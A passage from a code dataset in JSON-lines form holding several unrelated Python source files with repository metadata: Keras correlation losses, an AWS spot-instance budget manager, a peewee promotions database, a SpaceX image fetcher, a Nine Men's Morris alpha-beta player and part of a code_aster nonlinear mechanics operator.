np.mean(fs_true * fs_pred)\n\n stdv_true = np.std(y_true)\n stdv_pred = np.std(y_pred)\n\n return covariance / (stdv_true * stdv_pred)\n\ndef pearson_correlation(y_true, y_pred):\n x = y_true\n y = y_pred\n mx = K.mean(x)\n my = K.mean(y)\n xm, ym = x-mx, y-my\n r_num = K.sum(tf.multiply(xm,ym))\n r_den = K.sqrt(tf.multiply(K.sum(K.square(xm)), K.sum(K.square(ym))))\n r = r_num / r_den\n\n r = K.maximum(K.minimum(r, 1.0), -1.0)\n return r\n\n#https://stackoverflow.com/questions/46619869/how-to-specify-the-correlation-coefficient-as-the-loss-function-in-keras\ndef correlation_coefficient_loss(y_true, y_pred):\n x = y_true\n y = y_pred\n mx = K.mean(x)\n my = K.mean(y)\n xm, ym = x-mx, y-my\n r_num = K.sum(tf.multiply(xm,ym))\n r_den = K.sqrt(tf.multiply(K.sum(K.square(xm)), K.sum(K.square(ym))))\n r = r_num / r_den\n\n r = K.maximum(K.minimum(r, 1.0), -1.0)\n return K.square(1 - r)\n\nmodel_embedding = FastText.load(base_path + \"/Models/Word Embedding/idwiki.model\")\ndeep_module = load_model(base_path + \"/Models/model_32_02_05\", custom_objects = {\n \"correlation_coefficient_loss\": correlation_coefficient_loss,\n \"pearson_correlation\": pearson_correlation\n })\n\ndef get_lextical_similarity(sentence_1, sentence_2):\n lexical_similarity = []\n result = shallow_module(sentence_1, sentence_2)\n lexical_similarity.append(result)\n lexical_similarity = np.array(lexical_similarity).astype(np.float32)\n return lexical_similarity\n\ndef preprocess_sentence(sentence):\n embedded_sentence = to_vector(sentence)\n embedded_sentence = [embedded_sentence]\n embedded_sentence = np.array(embedded_sentence).astype(np.float32)\n return embedded_sentence\n\ndef integration_module(sentence_1, sentence_2, proportion_semantic, shared_parameter):\n embedded_sentence_1 = preprocess_sentence(sentence_1)\n embedded_sentence_2 = preprocess_sentence(sentence_2)\n lexical_similarity = get_lextical_similarity(sentence_1, sentence_2)\n semantic_similarity = deep_module.predict([embedded_sentence_1, embedded_sentence_2]).reshape(-1)\n result = shared_parameter * semantic_similarity[0] + proportion_semantic * lexical_similarity\n return result[0]\n","repo_name":"adamfdhl/uks-backend","sub_path":"utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7309105817","text":"import logging\nimport sys\nimport time\nimport boto3\nfrom datetime import datetime\nfrom datetime import timedelta\nimport operator\nimport threading\nfrom instance_operations import instance_operations\nimport rds_operations\n\n# function getLogger\n#\n# \\param name: Name of the logger\n# \\return Logger object\n#\n# This function simply creates a new logger object to output information\ndef getLogger(name):\n now = datetime.now()\n #Logging configuration\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n #Log formatter\n formatter = logging.Formatter(\"[%(asctime)s] %(levelname)-8s %(message)s\")\n #Log File handler\n handler = logging.FileHandler(\"jm_handler.log\")\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n #Screen handler\n screenHandler = logging.StreamHandler(stream=sys.stdout)\n screenHandler.setLevel(logging.DEBUG)\n screenHandler.setFormatter(formatter)\n logger.addHandler(screenHandler)\n return logger\n\n# function get_from_input\n#\n# \\param _string: String to be searched from input\n# \\param input_dict: Input dictionary of pairs key=value\n# \\return Value stored for _string or -1 if it does not exist\ndef get_from_input(_string, input_dict):\n if _string in input_dict:\n return input_dict[_string]\n else:\n return -1\n\n# function pareto\n# \\param target_nodes: number of instances that will be used\n# \\param data_hash: data to be executed hash (needs to be stored in the database)\n# \\param idparameters: database id with the parameters used in experiment\n#\n# This function will print the estimated Pareto given the stored performance and\n# current price for each instance. Note that the Job Manager instance selected\n# is the c5.4xlarge and all disks are 20GB 1000IOPS, therefore the prices are\n# defined as such.\n#\n# Furthermore, we consider a performance penalty of 0.1% for each new instance\n# added.\ndef pareto(target_nodes, data_hash, idparameters):\n all_zones = ['us-east-1a', 'us-east-1b', 'us-east-1c', 'us-east-1d', 'us-east-1e', 'us-east-1f']\n\n conn = rds_operations.rds_connect()\n target_tasks = rds_operations.get_interpols(conn, idparameters, rds_operations.get_iddata(conn, data_hash))\n iddata = rds_operations.get_iddata(conn, data_hash)\n\n all_performance = rds_operations.get_interpsec_allinstances(conn, iddata, idparameters)\n ops = instance_operations(logger)\n\n jm_perf = 0\n for result in all_performance:\n if result[0]== \"c5.4xlarge\":\n jm_perf = float(result[1])\n\n logger.info(\"INSTANCE_TYPE\\tTIME_TO_RUN(seconds)\\tCOST(dollars)\")\n for result in all_performance:\n instance_type = result[0]\n interpsec = result[1]\n stddev_interpsec = result[2]\n\n # prices = instance_operations.get_current_spot_price_allaz(ec2, instance_type)\n\n best_price = 10000\n best_az = \"\"\n\n for az in all_zones:\n price = ops.get_current_spot_price(instance_type, az) + 0.09375\n\n if (price < best_price and price > 0):\n best_price = price\n best_az = az\n\n costperinterp = float(interpsec / (best_price / 3600))\n string = \"{}\\t{}\\t{}\"\n time_to_run = target_tasks / (jm_perf + interpsec * target_nodes * (1-((target_nodes-1)/1000.0)))\n price_to_pay = time_to_run * target_nodes * best_price / 3600 + time_to_run * 0.68 / 3600\n logger.info(string.format(instance_type,time_to_run,price_to_pay))\n\n# function main\n#\n# \\param (command line input) interval : time to wait for the next iteration in minutes\n# \\param (command line input) budget : budget in dollars to complete the execution\n# \\param (command line input) data_hash : dataset hash stored in the database\n# \\param (command line input) nodes : maximum number of instances running\n# (id parameters is set as default to 41, can be changed in code)\n#\n# Before the iterations loop, this function sets the input parameters and\n# initializes the database connection, getting the number dataset and how many\n# tasks need to be completed.\n#\n# The most important part is after the initialization, in which the program\n# computes how much was spent (considering a Job Manager of type c5.4xlarge\n# and a 20GB 1000IOPS disk) and how many tasks were completed. With those\n# values, it verifies if any instance is constantly going over budget,\n# killing the ones that are and replacing them with instances that are not.\n#\n# If the experiment cannot continue due to budget constraints, then the budget\n# is increased by 10%.\n#\n# This loop ends after the main SPITS program finishes the execution (or the\n# number of tasks completed is greater or equal to the one stored in\n# the database).\ndef main():\n input_dict = {}\n for cur in sys.argv:\n if '=' in cur:\n key, val = cur.split('=')\n input_dict.update({key: val})\n\n interval = float(get_from_input(\"interval\", input_dict))\n\n budget = float(get_from_input(\"budget\", input_dict))\n data_hash = get_from_input(\"data_hash\", input_dict)\n target_nodes = int(get_from_input(\"nodes\", input_dict))\n\n valid_count = int(get_from_input(\"valid_count\", input_dict))\n if (valid_count == -1):\n valid_count = 1\n\n all_zones = ['us-east-1a', 'us-east-1b', 'us-east-1c', 'us-east-1d', 'us-east-1e', 'us-east-1f']\n\n idparameters = 41\n\n conn = rds_operations.rds_connect()\n target_tasks = rds_operations.get_interpols(conn, idparameters, rds_operations.get_iddata(conn, data_hash))\n iddata = rds_operations.get_iddata(conn, data_hash)\n\n spent_sofar = 0\n tasks_sofar = 0\n\n in_budget = budget\n _in_budget = in_budget\n in_tasks = target_tasks\n\n pareto(target_nodes, data_hash, idparameters)\n\n tasks_str = 'TASKS PROCESSED SO FAR = {}/{}'\n money_str = 'MONEY SPENT SO FAR = {}/{} (user requested = {})'\n money_left_str = 'MONEY LEFT TO SPEND = {} (user requested = {}) | TARGET RATIO = {}'\n instances_str = 'NUMBER OF INSTANCES RUNNING = {}/{}'\n simulated_time = 'TIMENOW = {}'\n\n ops = instance_operations(logger)\n time_start = ops.get_jobmanager_init_time()\n\n ec2 = boto3.client('ec2', region_name='us-east-1')\n cloudwatch = boto3.client('cloudwatch')\n\n log_to_csv = 'CSV\\t{}\\t{}'\n\n time_spent = 0\n\n run_dict = {}\n wk_spent_sofar = 0\n jm_spent_sofar = 0\n ec2_res = boto3.resource('ec2', region_name='us-east-1')\n #time.sleep(180)\n while target_tasks > 0:\n # Update cost\n jm_diff = (datetime.utcnow() - time_start)\n jm_spent_sofar = jm_diff.total_seconds() * (0.68+0.09375) / 3600\n\n for key,inst in run_dict.items():\n diff = datetime.utcnow() - inst[\"cur_time\"]\n inst[\"cur_time\"] = datetime.utcnow()\n wk_spent_sofar += float(inst[\"price\"]) * diff.total_seconds() / 3600\n inst[\"prev_valid\"] = inst[\"valid\"]\n inst[\"valid\"] = 0\n\n # Verifies running instances\n instance_reservations = ops.get_instance_reservations()\n for instance in instance_reservations['Reservations']:\n instance_id = instance['Instances'][0]['InstanceId']\n instance_type = instance['Instances'][0]['InstanceType']\n instance_az = instance['Instances'][0]['Placement']['AvailabilityZone']\n\n ec2_instance = ec2_res.Instance(instance_id)\n init_time = datetime.strptime(ec2_instance.launch_time.strftime(\"%Y-%m-%dT%H:%M:%S\"), \"%Y-%m-%dT%H:%M:%S\")\n\n result = cloudwatch.get_metric_statistics(Namespace='Performance',\n MetricName='perf_sec',\n StartTime=(datetime.today() - timedelta(minutes=2*interval)),\n Dimensions=[{'Name': 'Instance Id', 'Value': instance_id},\n {'Name': 'Type', 'Value': instance_type}],\n EndTime=datetime.today(),\n Period=60,\n Statistics=['Average'])\n\n tasks_completed = cloudwatch.get_metric_statistics(Namespace='Performance',\n MetricName='tasks_completed',\n StartTime=(datetime.today() - timedelta(minutes=2*interval)),\n Dimensions=[{'Name': 'Instance Id', 'Value': instance_id},\n {'Name': 'Type', 'Value': instance_type}],\n EndTime=datetime.today(),\n Period=60,\n Statistics=['Maximum'])\n\n result_stdev = cloudwatch.get_metric_statistics(Namespace='Performance',\n MetricName='perf_sec_stdev',\n StartTime=(datetime.today() - timedelta(minutes=2*interval)),\n Dimensions=[{'Name': 'Instance Id', 'Value': instance_id},\n {'Name': 'Type', 'Value': instance_type}],\n EndTime=datetime.today(),\n Period=60,\n Statistics=['Average'])\n\n if tasks_completed['Datapoints']:\n if (tasks_completed['Datapoints'][0]['Maximum']) > tasks_sofar:\n tasks_sofar = tasks_completed['Datapoints'][0]['Maximum']\n\n if not instance_id in run_dict:\n if result['Datapoints'] and result_stdev['Datapoints']:\n price = ops.get_current_spot_price(instance_type, instance_az) + 0.09375\n performance_negative = float(result['Datapoints'][0]['Average']) - float(\n result_stdev['Datapoints'][0]['Average'])\n\n instance_dict = {\"instance_id\":instance_id,\n \"instance_type\":instance_type,\n \"instance_az\":instance_az,\n \"price\":price,\n \"performance_negative\":performance_negative,\n \"init_time\":init_time,\n \"cur_time\": init_time,\n \"valid\":valid_count,\n \"prev_valid\": valid_count}\n\n run_dict[instance_id] = instance_dict\n else:\n price = ops.get_current_spot_price(instance_type, instance_az) + 0.09375\n instance_dict = {\"instance_id\": instance_id,\n \"instance_type\": instance_type,\n \"instance_az\": instance_az,\n \"price\": price,\n \"performance_negative\": -1,\n \"init_time\": init_time,\n \"cur_time\": init_time,\n \"valid\": valid_count,\n \"prev_valid\":valid_count}\n run_dict[instance_id] = instance_dict\n else:\n instance_dict = run_dict[instance_id]\n instance_dict[\"valid\"] = instance_dict[\"prev_valid\"]\n\n if result['Datapoints'] and result_stdev['Datapoints']:\n instance_dict[\"price\"] = ops.get_current_spot_price(instance_type, instance_az) + 0.09375\n instance_dict[\"performance_negative\"] = float(result['Datapoints'][0]['Average']) - float(result_stdev['Datapoints'][0]['Average'])\n\n spent_sofar = wk_spent_sofar + jm_spent_sofar\n\n target_tasks = in_tasks - tasks_sofar\n budget = in_budget - spent_sofar\n\n target_ratio = target_tasks / budget\n\n logger.info(simulated_time.format(datetime.now()))\n logger.info(tasks_str.format(tasks_sofar, in_tasks))\n logger.info(money_str.format(spent_sofar, in_budget, _in_budget))\n logger.info(money_left_str.format(budget, _in_budget, target_ratio))\n logger.info(instances_str.format(len(run_dict.keys()), target_nodes))\n logger.info(log_to_csv.format(((datetime.utcnow() - time_start).total_seconds()),spent_sofar))\n\n logger.debug(\"INSTANCES RUNNING\")\n for key,inst in run_dict.items():\n logger.debug(inst)\n\n if (target_tasks <= 0):\n break\n\n for key,inst in run_dict.items():\n if (inst[\"performance_negative\"]/(inst[\"price\"]/3600) < target_ratio or inst[\"performance_negative\"] == -1):\n inst[\"valid\"] -= 1\n logger.debug(\"DECREASING COUNTER FOR INST \" + inst[\"instance_id\"] + \"(\" + inst[\"instance_type\"] + \"), NOW: \" + str(inst[\"valid\"]))\n else:\n inst[\"valid\"] = min(inst[\"valid\"] + 1, valid_count)\n\n if (inst[\"valid\"] <= 0):\n logger.debug('REMOVING INST ' + inst[\"instance_id\"])\n ops.terminateInstance(inst[\"instance_id\"])\n\n\n for key in list(run_dict.keys()):\n if run_dict[key][\"valid\"] <= 0:\n del run_dict[key]\n\n if (len(list(run_dict.keys())) < target_nodes):\n candidates = []\n\n while len(candidates) == 0:\n budget = in_budget - spent_sofar\n target_ratio = target_tasks / budget\n all_performance = rds_operations.get_interpsec_allinstances(conn, iddata, idparameters)\n\n for result in all_performance:\n instance_type = result[0]\n interpsec = result[1]\n stddev_interpsec = result[2]\n\n prices = ops.get_current_spot_price_allaz(instance_type)\n\n for az in prices:\n price = prices[az] + 0.09375\n costperinterp = float(interpsec / (price / 3600))\n costperinterp_stdev = float(stddev_interpsec / (price / 3600))\n costperinterp_negative = costperinterp - costperinterp_stdev\n\n instance_dict = {\"instance_id\": \"inactive\",\n \"instance_type\": instance_type,\n \"instance_az\": az,\n \"price\": price,\n \"performance_negative\": interpsec,\n }\n\n if costperinterp_negative > target_ratio:\n temp = [inst for inst in run_dict.values() if inst['instance_type'] == instance_type and inst['instance_az'] == az]\n if (len(temp) == 0):\n candidates.append(instance_dict)\n else:\n for inst in temp:\n if (inst not in candidates):\n candidates.append(inst)\n\n candidates.sort(key=operator.itemgetter('performance_negative'), reverse=True)\n\n if (len(candidates) == 0):\n logger.error(\"IMPOSSIBLE TO RUN EXPERIMENT WITH THIS CONFIGURATION\")\n in_budget += in_budget / 10\n logger.error(\"INCREASING BUDGET BY 10\\% (TO \" + str(in_budget) + \" USD)\")\n\n logger.debug(\"CANDIDATES\")\n for inst in candidates:\n logger.debug(inst)\n\n k = 0\n counter = 0\n while len(run_dict.keys()) < target_nodes and counter < 5:\n threads = []\n num_threads = min(target_nodes - len(run_dict.keys()), int(target_nodes/5))\n # Replace instances\n for i in range(0, num_threads):\n thr = threading.Thread(target=ops.createSpotInstanceThreads, args=(candidates[k]['instance_type'], candidates[k]['instance_az'], candidates[k]['price'],valid_count,run_dict))\n thr.start()\n threads.append(thr)\n\n for thr in threads:\n thr.join()\n\n k = (k + 1) % len(candidates)\n if k == 0:\n counter += 1\n\n time.sleep(interval*60)\n\nif __name__ == \"__main__\":\n logger = getLogger(__name__)\n main()\n","repo_name":"hpg-cepetro/CloudPITS","sub_path":"main/to_execute.py","file_name":"to_execute.py","file_ext":"py","file_size_in_byte":16843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35343766735","text":"import peewee\nfrom datetime import datetime, timedelta\n\nfrom helpers.Paths import DATABASE_PATH\n\ndatabase = peewee.SqliteDatabase(DATABASE_PATH, timeout=3, pragmas={'journal_mode': 'wal'})\n\n\nclass BaseTable(peewee.Model):\n class Meta:\n database = database\n\n\nclass Actions(BaseTable):\n \"\"\"Генерация таблицы\"\"\"\n partner = peewee.CharField()\n name = peewee.CharField()\n start_date = peewee.DateTimeField()\n end_date = peewee.DateTimeField()\n last_update = peewee.DateTimeField()\n\n\ndef create_database():\n \"\"\"Создание таблиц, если их еще нет\"\"\"\n database.create_tables([Actions, ])\n\n\ndef add_to_database(partner, name, start_date, end_date, last_update=None):\n \"\"\"Добавление новой записи в БД\"\"\"\n if isinstance(start_date, str):\n start_date = datetime.strptime(start_date, '%d.%m.%Y')\n if isinstance(end_date, str):\n end_date = datetime.strptime(end_date, '%d.%m.%Y')\n end_date = end_date.replace(hour=23, minute=59, second=59)\n last_update = datetime.strptime(last_update, '%d.%m.%Y') if isinstance(last_update, str) else datetime.now()\n Actions.create(partner=partner,\n name=name,\n start_date=start_date,\n end_date=end_date,\n last_update=last_update)\n\n\ndef check_actions_on_name(name):\n \"\"\"Проверка, существует ли акция с таким именем в базе\"\"\"\n for action in Actions.select():\n if action.name == name:\n return True\n\n\ndef delete_expired_actions(queue):\n \"\"\"Удаление акций если дата окончания уже прошла\"\"\"\n queue.put(\n f'Было удалено устаревших акций из БД: {Actions.delete().where(Actions.end_date < datetime.now()).execute()}')\n\n\ndef show_expired_actions():\n \"\"\"Вывести на экран устаревшие акции\"\"\"\n try:\n yesterday = datetime.now()-timedelta(days=2)\n partner = Actions.select().where(Actions.end_date < yesterday).get().partner\n name = Actions.select().where(Actions.end_date < datetime.now()).get().name\n start_date = Actions.select().where(Actions.end_date < datetime.now()).get().start_date.strftime('%d.%m.%Y')\n end_date = Actions.select().where(Actions.end_date < datetime.now()).get().end_date.strftime('%d.%m.%Y')\n print(f'Акция устарела: {partner}: {name}, {start_date} - {end_date}')\n except:\n pass\n\ndef print_stat(queue):\n \"\"\"Вывод статистики последнего обновления на экран\"\"\"\n try:\n query = Actions.select(Actions.partner, Actions.last_update).order_by(Actions.last_update)\n statistics = {}\n for distinct_ts in query.tuples():\n statistics[distinct_ts[0]] = distinct_ts[1].strftime('%d.%m.%Y')\n for partner, end_date in statistics.items():\n queue.put(f'Партнер: {partner} , последнее обновление {end_date}')\n except:\n queue.put('База данных пуста')\n\n\ndef show_actions():\n \"\"\"Вывести на экран все существующие акции в БД\"\"\"\n for row in Actions.select().tuples():\n row = list(row)\n row[3] = row[3].strftime('%d.%m.%Y')\n row[4] = row[4].strftime('%d.%m.%Y')\n row[5] = row[5].strftime('%d.%m.%Y')\n print(*row)\n\n\n#TODO Удалить\ndef actions_exists_in_db(partner, name, start_date, end_date):\n \"\"\"Если акции нет в базе то добавляем ее\"\"\"\n if check_actions_on_name(name) is None:\n add_to_database(partner, name, start_date, end_date)\n return False\n else:\n print('акция с таким названием есть в базе')\n return True\n\ndef actions_exists_in_db_new(action):\n \"\"\"Если акции нет в базе то добавляем ее\"\"\"\n if check_actions_on_name(action.name) is None:\n add_to_database(action.partner_name, action.name, action.start, action.end)\n return False\n else:\n print('акция с таким названием есть в базе')\n return True\n\n\ndef clear_partner_info(partner):\n \"\"\"Удалить все записи по партнеру\"\"\"\n print(f'Было удалено {Actions.delete().where(Actions.partner == partner).execute()} акций для партнера {partner}')\n","repo_name":"Balrock1989/DT","sub_path":"database/DataBase.py","file_name":"DataBase.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20532128999","text":"import requests\r\nimport os\r\nfrom utils import load_img_with_pillow\r\n\r\n\r\ndef get_spacex_images_urls():\r\n url = \"https://api.spacexdata.com/v4/launches/latest\"\r\n response = requests.get(url=url)\r\n response.raise_for_status()\r\n links = response.json()['links']['flickr']['original']\r\n return links\r\n\r\n\r\ndef fetch_spacex_last_launch(path):\r\n name = \"spacex\"\r\n links = get_spacex_images_urls()\r\n for num, link in enumerate(links):\r\n temp_path = os.path.join(path, f'{name}_{num}')\r\n load_img_with_pillow(url=link, path=temp_path)\r\n\r\n","repo_name":"Mikhail-Gl96/Space_instagram","sub_path":"fetch_spacex.py","file_name":"fetch_spacex.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2985936784","text":"import sys\r\n\r\nclass ABOpening:\r\n def __init__(self):\r\n self.leavesEvaluated = 0\r\n\r\n def findBestMove(self, board, depth):\r\n bestMove = board\r\n bestEstimate = float('-inf')\r\n possibleMoves = self.generateMovesOpening(board)\r\n for move in possibleMoves:\r\n estimate = self.abMinMax(move, depth-1, bestEstimate, float(\"inf\"))\r\n if estimate > bestEstimate:\r\n bestEstimate = estimate\r\n bestMove = move\r\n return (bestMove, self.leavesEvaluated, bestEstimate)\r\n\r\n def abMinMax(self, board, depth, alpha, beta):\r\n if depth == 0:\r\n self.leavesEvaluated += 1\r\n return self.staticEstimateOpening(board)\r\n bestEstimate = float('inf')\r\n possibleMoves = self.generateBlackMovesOpening(board)\r\n for move in possibleMoves:\r\n estimate = self.abMaxMin(move, depth - 1, alpha, beta)\r\n if estimate <= bestEstimate:\r\n bestEstimate = estimate\r\n if bestEstimate <= alpha:\r\n return bestEstimate\r\n beta = min(beta, bestEstimate)\r\n return bestEstimate\r\n\r\n def abMaxMin(self, board, depth, alpha, beta):\r\n if depth == 0:\r\n self.leavesEvaluated += 1\r\n return self.staticEstimateOpening(board)\r\n bestEstimate = float('-inf')\r\n possibleMoves = self.generateMovesOpening(board)\r\n for move in possibleMoves:\r\n estimate = self.abMinMax(move, depth - 1, alpha, beta)\r\n if estimate >= bestEstimate:\r\n bestEstimate = estimate\r\n if bestEstimate >= beta:\r\n return bestEstimate\r\n alpha = max(alpha, bestEstimate)\r\n return bestEstimate\r\n\r\n def generateMovesOpening(self, board):\r\n return self.generateAdd(board)\r\n\r\n def generateAdd(self, board):\r\n possibleMoves = []\r\n for location in range(18):\r\n if board[location] == 'x':\r\n if location == 0:\r\n possibleBoard = 'W' + board[1:]\r\n elif location == 17:\r\n possibleBoard = board[:17] + 'W'\r\n else:\r\n possibleBoard = board[:location]+'W'+board[location+1:]\r\n #print(possibleBoard, len(possibleBoard))\r\n if self.closeMill(location, possibleBoard):\r\n possibleMoves = self.generateRemove(possibleBoard, possibleMoves)\r\n else:\r\n possibleMoves.append(possibleBoard)\r\n return possibleMoves\r\n\r\n def generateRemove(self, board, possibleMoves):\r\n opponentPieceAvailable = False\r\n for location in range(18):\r\n if board[location] == 'B' and not self.closeMill(location, board):\r\n opponentPieceAvailable = True\r\n if location == 0:\r\n possibleBoard = 'x' + board[1:]\r\n elif location == 17:\r\n possibleBoard = board[:17] + 'x'\r\n else:\r\n possibleBoard = board[:location]+'x'+board[location+1:]\r\n #print(possibleBoard, len(possibleBoard), location)\r\n possibleMoves.append(possibleBoard)\r\n if not opponentPieceAvailable:\r\n possibleMoves.append(board)\r\n return possibleMoves\r\n\r\n def closeMill(self, location, board):\r\n piece = board[location]\r\n if location == 0 and (board[2] == piece and board[4] == piece):\r\n return True\r\n elif location == 1 and ((board[3] == piece and board[5] == piece) or (board[8] == piece and board[17] == piece)):\r\n return True\r\n elif location == 2 and (board[0] == piece and board[4] == piece):\r\n return True\r\n elif location == 3 and ((board[1] == piece and board[5] == piece) or (board[7] == piece and board[14] == piece)):\r\n return True\r\n elif location == 4 and (board[0] == piece and board[2] == piece):\r\n return True\r\n elif location == 5 and ((board[1] == piece and board[3] == piece) or (board[11] == piece and board[6] == piece)):\r\n return True\r\n elif location == 6 and ((board[7] == piece and board[8] == piece) or (board[5] == piece and board[11] == piece)):\r\n return True\r\n elif location == 7 and ((board[6] == piece and board[8] == piece) or (board[3] == piece and board[14] == piece)):\r\n return True\r\n elif location == 8 and ((board[6] == piece and board[7] == piece) or (board[1] == piece and board[17] == piece)):\r\n return True\r\n elif location == 9 and ((board[10] == piece and board[11] == piece) or (board[12] == piece and board[15] == piece)):\r\n return True\r\n elif location == 10 and ((board[9] == piece and board[11] == piece) or (board[13] == piece and board[16] == piece)):\r\n return True\r\n elif location == 11 and ((board[5] == piece and board[6] == piece) or (board[9] == piece and board[10] == piece) or (board[14] == piece and board[17] == piece)):\r\n return True\r\n elif location == 12 and ((board[9] == piece and board[15] == piece) or (board[13] == piece and board[14] == piece)):\r\n return True\r\n elif location == 13 and ((board[10] == piece and board[16] == piece) or (board[12] == piece and board[14] == piece)):\r\n return True\r\n elif location == 14 and ((board[3] == piece and board[7] == piece) or (board[12] == piece and board[13] == piece) or (board[11] == piece and board[17] == piece)):\r\n return True\r\n elif location == 15 and (board[9] == piece and board[12] == piece or (board[16] == piece and board[17] == piece)):\r\n return True\r\n elif location == 16 and ((board[10] == piece and board[13] == piece) or (board[15] == piece and board[17] == piece)):\r\n return True\r\n elif location == 17 and ((board[1] == piece and board[8] == piece) or (board[11] == piece and board[14] == piece) or (board[15] == piece and board[16] == piece)):\r\n return True\r\n else:\r\n return False\r\n\r\n def staticEstimateOpening(self, board):\r\n numWhitePieces = 0\r\n numBlackPieces = 0\r\n for piece in board:\r\n if piece =='W':\r\n numWhitePieces += 1\r\n elif piece == 'B':\r\n numBlackPieces += 1\r\n return (numWhitePieces - numBlackPieces)\r\n\r\n def swapPieces(self, board):\r\n boardAsList = [state for state in board]\r\n for location in range(18):\r\n if boardAsList[location] == 'B':\r\n boardAsList[location] = 'W';\r\n elif boardAsList[location] == 'W':\r\n boardAsList[location] = 'B';\r\n return ''.join(boardAsList)\r\n\r\n def generateBlackMovesOpening(self, board):\r\n swappedBoard = self.swapPieces(board)\r\n possibleMovesSwapped = self.generateMovesOpening(swappedBoard)\r\n #print(swappedBoard, possibleMovesSwapped)\r\n possibleMoves = []\r\n for move in possibleMovesSwapped:\r\n possibleMoves.append(self.swapPieces(move))\r\n #print(board, possibleMoves)\r\n return possibleMoves\r\n\r\ninputFile = open(sys.argv[1], 'r')\r\noutputFile = open(sys.argv[2], 'w')\r\ndepth = int(sys.argv[3])\r\nboardPosition = inputFile.readline()\r\ninputFile.close()\r\ngame = ABOpening()\r\nbestMove, numPosEvaluated, bestEstimate = game.findBestMove(boardPosition, depth)\r\noutputFile.write(\"Board Position: \" + bestMove + \"\\nPositions evaluated by static estimate: \" + str(numPosEvaluated) + \"\\nMINIMAX estimate: \" + str(bestEstimate))\r\noutputFile.close()\r\nprint(\"Board Position:\", bestMove)\r\nprint(\"Positions evaluated by static estimate:\", numPosEvaluated)\r\nprint(\"MINIMAX estimate:\", bestEstimate)","repo_name":"Devarshaa/AI-9MenMorris-Player","sub_path":"ABOpening.py","file_name":"ABOpening.py","file_ext":"py","file_size_in_byte":7828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20428168481","text":"from ..Cata.Syntax import _F\nfrom ..Helpers import adapt_for_mgis_behaviour\nfrom ..Messages import UTMESS\nfrom ..Objects import (\n HHO,\n FrictionType,\n MechanicalDirichletBC,\n MechanicalLoadFunction,\n MechanicalLoadReal,\n NonLinearResult,\n ParallelMechanicalLoadFunction,\n ParallelMechanicalLoadReal,\n PhysicalProblem,\n)\nfrom ..Solvers import ContactManager, NonLinearSolver, ProblemSolver\nfrom ..Solvers import SolverOptions as SOP\nfrom ..Solvers import TimeStepper\nfrom ..Utilities import print_stats, reset_stats\n\n\ndef _contact_check(CONTACT):\n \"\"\"Add controls to prohibit unconverted features in contact\"\"\"\n if CONTACT:\n assert CONTACT[0][\"ALGO_RESO_GEOM\"] == \"NEWTON\"\n\n defi = CONTACT[0][\"DEFINITION\"]\n\n for zone in defi.getContactZones():\n assert not zone.hasSmoothing\n assert zone.getPairingParameter().getDistanceFunction() is None\n assert zone.getPairingParameter().getElementaryCharacteristics() is None\n\n if zone.hasFriction:\n assert zone.getFrictionParameter().getType() == FrictionType.Without\n\n if defi.hasFriction:\n assert CONTACT[0][\"ALGO_RESO_FROT\"] == \"NEWTON\"\n\n\ndef _keywords_check(keywords):\n \"\"\"Add controls to prohibit unconverted features.\"\"\"\n\n if \"EXCIT\" in keywords:\n for load in keywords[\"EXCIT\"]:\n if load[\"TYPE_CHARGE\"] != \"FIXE_CSTE\":\n raise RuntimeError(\"TYPE_CHARGE not supported\")\n\n if \"INCREMENT\" in keywords:\n if \"NUME_INST_INIT\" in keywords[\"INCREMENT\"] or \"NUME_INST_FIN\" in keywords[\"INCREMENT\"]:\n raise RuntimeError(\"unsupported value in INCREMENT\")\n # FIXME todo: check consistency between INST_INIT and INST_ETAT_INIT\n\n if \"CONVERGENCE\" in keywords:\n for key in keywords[\"CONVERGENCE\"]:\n if key in (\"RESI_REFE_RELA\", \"RESI_COMP_RELA\"):\n raise RuntimeError(\"unsupported value in CONVERGENCE: %s\" % key)\n\n if keywords[\"METHODE\"] not in [\"NEWTON\", \"SNES\"]:\n raise RuntimeError(\"unsupported value in METHODE\")\n\n\ndef meca_non_line_ops(self, **args):\n \"\"\"Execute the command.\n\n Arguments:\n **args (dict): User's keywords.\n \"\"\"\n UTMESS(\"A\", \"QUALITY1_2\")\n reset_stats()\n\n args = _F(args)\n\n # Add controls to prohibit unconverted features\n _contact_check(args[\"CONTACT\"])\n _keywords_check(args)\n adapt_for_mgis_behaviour(self, args)\n\n # Create the problem solver\n solver = ProblemSolver(NonLinearSolver(), NonLinearResult())\n\n # Create the physical problem (and use it in problem solver)\n phys_pb = PhysicalProblem(args[\"MODELE\"], args[\"CHAM_MATER\"], args[\"CARA_ELEM\"])\n solver.use(phys_pb)\n\n # Add parameters\n param = dict(\n ARCHIVAGE=args[\"ARCHIVAGE\"],\n COMPORTEMENT=args[\"COMPORTEMENT\"],\n CONTACT=args[\"CONTACT\"],\n CONVERGENCE=args[\"CONVERGENCE\"],\n ETAT_INIT=args[\"ETAT_INIT\"],\n INFO=args[\"INFO\"],\n METHODE=args[\"METHODE\"],\n NEWTON=args[\"NEWTON\"],\n RECH_LINEAIRE=args[\"RECH_LINEAIRE\"],\n SOLVEUR=args[\"SOLVEUR\"],\n )\n solver.setKeywords(**param)\n\n # Add loads\n if args[\"EXCIT\"]:\n for load in args[\"EXCIT\"]:\n if isinstance(\n load[\"CHARGE\"],\n (\n MechanicalLoadFunction,\n MechanicalLoadReal,\n ParallelMechanicalLoadFunction,\n ParallelMechanicalLoadReal,\n MechanicalDirichletBC,\n ),\n ):\n phys_pb.addLoadFromDict(load)\n else:\n raise RuntimeError(\"Unknown load\")\n\n # Add contact\n contact_manager = None\n if args[\"CONTACT\"]:\n definition = args[\"CONTACT\"][0][\"DEFINITION\"]\n contact_manager = ContactManager(definition, phys_pb)\n fed_defi = definition.getFiniteElementDescriptor()\n 